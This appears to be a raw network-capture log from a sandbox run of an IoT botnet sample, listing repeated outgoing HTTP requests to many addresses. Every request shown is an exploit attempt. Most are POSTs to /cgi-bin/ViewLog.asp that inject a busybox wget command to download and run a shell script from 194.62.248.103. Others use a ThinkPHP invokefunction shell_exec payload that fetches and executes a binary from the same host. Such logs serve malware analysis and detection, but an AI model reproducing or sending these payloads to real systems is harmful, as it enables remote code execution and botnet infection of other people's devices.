                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.234818895.86.125.448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.371666908 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.235043885.98.37.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.635076046 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.233721031.136.15.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.295650005 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:17.266679049 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:19.186445951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.121707916 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:30.800688982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:46.158531904 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:17.642502069 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.235209494.121.150.248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.324953079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.2360622112.176.9.8280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.344479084 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.906613111 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.762228966 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:23.633783102 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:31.056747913 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:45.902611017 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:15.594657898 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.235801294.122.30.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.344659090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.235086895.131.97.13880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.931140900 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.224500895 CEST435INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:17 GMT
                                                        Server: Apache/2.4.58 (Unix) OpenSSL/3.0.13 mod_jk/1.2.49
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.235162895.216.85.8180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.955656052 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.273197889 CEST309INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.0
                                                        Date: Sun, 14 Apr 2024 14:37:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.234676895.217.165.21680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:16.959247112 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.281378984 CEST509INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:17 GMT
                                                        Server: Apache/2.4.58 (Ubuntu)
                                                        Content-Length: 315
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 6c 75 6d 6e 69 6b 6c 75 62 2e 72 63 6b 2d 66 61 75 73 74 2e 68 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.58 (Ubuntu) Server at alumniklub.rck-faust.hr Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.233666288.83.99.16680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:17.263242960 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.570386887 CEST307INHTTP/1.0 302 Found
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Location: http://:8026/index.php
                                                        Content-type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 3a 38 30 32 36 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="http://:8026/index.php">here</A>.<P></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.233391288.134.101.5380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:17.588423967 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:17.919127941 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.233279294.130.31.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.022387981 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.327615023 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:18 GMT
                                                        Server: Apache/2.4.10 (Debian)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.10 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.234268231.136.93.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:18.030512094 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.994436979 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.914031982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:24.913465023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
